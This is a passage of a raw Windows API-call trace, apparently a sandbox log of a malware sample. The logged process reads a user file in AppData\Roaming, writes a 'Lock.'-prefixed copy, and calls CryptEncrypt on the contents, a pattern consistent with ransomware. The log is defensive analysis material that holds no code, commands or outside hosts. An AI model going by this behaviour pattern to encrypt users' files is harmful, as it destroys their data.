wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.765] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0122.765] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0122.765] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0122.765] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72248 [0122.765] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0122.765] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0122.765] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0122.765] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72378 [0122.765] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fb8 [0122.765] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fa0 [0122.765] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0122.765] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa120 [0122.765] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0122.765] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa120 | out: hHeap=0x2af0000) returned 1 [0122.765] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fa0 | out: hHeap=0x2af0000) returned 1 [0122.765] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e6c0 [0122.765] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2a7a130 [0122.765] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0a8 [0122.765] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721b8 [0122.765] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/GYS46AI.wav" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\gys46ai.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4f0 [0122.766] SetFilePointerEx (in: hFile=0x4f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0122.766] SetFilePointerEx (in: hFile=0x4f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0122.766] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7120 [0122.766] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.766] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0122.766] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ebc0 [0122.766] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.766] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.766] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0122.766] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0122.766] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0122.766] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0122.766] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0122.766] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0122.766] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0122.766] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0122.766] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa048 [0122.766] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0122.766] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa120 [0122.766] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0122.766] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72368 [0122.766] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2a684e8 [0122.766] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming")) returned 0x10 [0122.767] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/Lock.GYS46AI.wav" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\lock.gys46ai.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4f4 [0122.767] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7080 [0122.767] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.767] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0122.767] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.767] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.767] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e8c0 [0122.767] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.767] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0122.767] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0122.767] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0122.767] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0122.770] SetFilePointerEx (in: hFile=0x4f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0122.770] ReadFile (in: hFile=0x4f0, lpBuffer=0x2a7a130, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2a7a130*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0122.772] ReadFile (in: hFile=0x4f0, lpBuffer=0x2a7a130, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2a7a130*, lpNumberOfBytesRead=0x8cf4f8*=0x8011, lpOverlapped=0x0) returned 1 [0122.773] ReadFile (in: hFile=0x4f0, lpBuffer=0x2a7a130, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2a7a130*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0122.778] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.778] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722d8 [0122.778] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa018 [0122.779] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa168 [0122.779] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0122.779] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0122.779] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18011) returned 0x2aaf410 [0122.780] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.780] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722d8 [0122.780] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0122.780] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7040 [0122.780] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.780] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722d8 [0122.780] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0122.780] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0122.780] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0122.783] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.783] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72528 [0122.783] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72578 [0122.783] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fd0 [0122.784] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa078 [0122.784] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72548 [0122.784] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1e0 [0122.784] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0122.784] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.784] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0122.784] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0122.784] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0122.784] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0122.784] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0122.784] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0122.784] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0122.784] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0122.785] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0122.785] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa288 [0122.785] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a28 [0122.785] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0122.785] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa2a0 [0122.785] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0122.785] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xd) returned 0x2aaa2a0 [0122.785] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aaa2a0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0122.786] CryptEncrypt (in: hKey=0x9a4a40, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x18011, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x18018) returned 1 [0122.786] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x29f7720 [0122.786] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0122.786] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a48 [0122.786] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa288 [0122.786] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa2a0 [0122.786] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa2b8 [0122.786] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0122.786] CharLowerBuffW (in: lpsz="byte[98328]", cchLength=0xb | out: lpsz="byte[98328]") returned 0xb [0122.786] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x24) returned 0x2a69850 [0122.786] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa198 [0122.786] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719d8 [0122.786] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa2d0 [0122.786] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0122.786] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa258 [0122.786] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0122.786] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa360 [0122.790] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0122.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa360 | out: hHeap=0x2af0000) returned 1 [0122.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0122.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa258 | out: hHeap=0x2af0000) returned 1 [0122.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0122.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2d0 | out: hHeap=0x2af0000) returned 1 [0122.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0122.792] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0122.793] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18018) returned 0x37f0088 [0122.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78160 | out: hHeap=0x2af0000) returned 1 [0122.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0122.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78048 | out: hHeap=0x2af0000) returned 1 [0122.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0122.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa120 | out: hHeap=0x2af0000) returned 1 [0122.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa048 | out: hHeap=0x2af0000) returned 1 [0122.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa108 | out: hHeap=0x2af0000) returned 1 [0122.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0122.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa168 | out: hHeap=0x2af0000) returned 1 [0122.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0122.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa030 | out: hHeap=0x2af0000) returned 1 [0122.793] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7180 [0122.793] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x24) returned 0x2a69b50 [0122.793] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa030 [0122.793] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0122.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa198 | out: hHeap=0x2af0000) returned 1 [0122.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0122.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a69850 | out: hHeap=0x2af0000) returned 1 [0122.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fc0 | out: hHeap=0x2af0000) returned 1 [0122.793] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa048 [0122.793] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa168 [0122.793] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0122.793] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6fe0 [0122.793] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x24) returned 0x2a69b20 [0122.793] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa108 [0122.793] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0122.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0122.794] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa120 [0122.794] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0122.794] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3f0 | out: hHeap=0x2af0000) returned 1 [0122.794] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa330 | out: hHeap=0x2af0000) returned 1 [0122.794] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa198 | out: hHeap=0x2af0000) returned 1 [0122.794] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0122.795] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0122.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa108 | out: hHeap=0x2af0000) returned 1 [0122.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0122.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a69b20 | out: hHeap=0x2af0000) returned 1 [0122.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fe0 | out: hHeap=0x2af0000) returned 1 [0122.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa168 | out: hHeap=0x2af0000) returned 1 [0122.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa120 | out: hHeap=0x2af0000) returned 1 [0122.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x38080a8 | out: hHeap=0x2af0000) returned 1 [0122.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0122.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa198 | out: hHeap=0x2af0000) returned 1 [0122.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa048 | out: hHeap=0x2af0000) returned 1 [0122.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x38200c8 | out: hHeap=0x2af0000) returned 1 [0122.798] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0122.798] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0122.798] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78458 | out: hHeap=0x2af0000) returned 1 [0122.798] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0122.798] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0122.798] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0122.798] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78408 | out: hHeap=0x2af0000) returned 1 [0122.798] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0122.798] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3c0 | out: hHeap=0x2af0000) returned 1 [0122.798] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa168 | out: hHeap=0x2af0000) returned 1 [0122.798] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa120 | out: hHeap=0x2af0000) returned 1 [0122.798] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0122.798] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0122.798] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e680 | out: hHeap=0x2af0000) returned 1 [0122.798] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0122.798] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4c8 | out: hHeap=0x2af0000) returned 1 [0122.798] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa168 | out: hHeap=0x2af0000) returned 1 [0122.798] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa120 | out: hHeap=0x2af0000) returned 1 [0122.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0122.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0122.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0122.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa108 | out: hHeap=0x2af0000) returned 1 [0122.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0122.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0122.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0122.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0122.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa048 | out: hHeap=0x2af0000) returned 1 [0122.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0122.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0122.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0122.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa390 | out: hHeap=0x2af0000) returned 1 [0122.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3c0 | out: hHeap=0x2af0000) returned 1 [0122.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3a8 | out: hHeap=0x2af0000) returned 1 [0122.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0122.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0122.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78020 | out: hHeap=0x2af0000) returned 1 [0122.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0122.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0122.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0122.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3d8 | out: hHeap=0x2af0000) returned 1 [0122.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa450 | out: hHeap=0x2af0000) returned 1 [0122.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4f8 | out: hHeap=0x2af0000) returned 1 [0122.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0122.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0122.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0122.800] HeapFree (in: 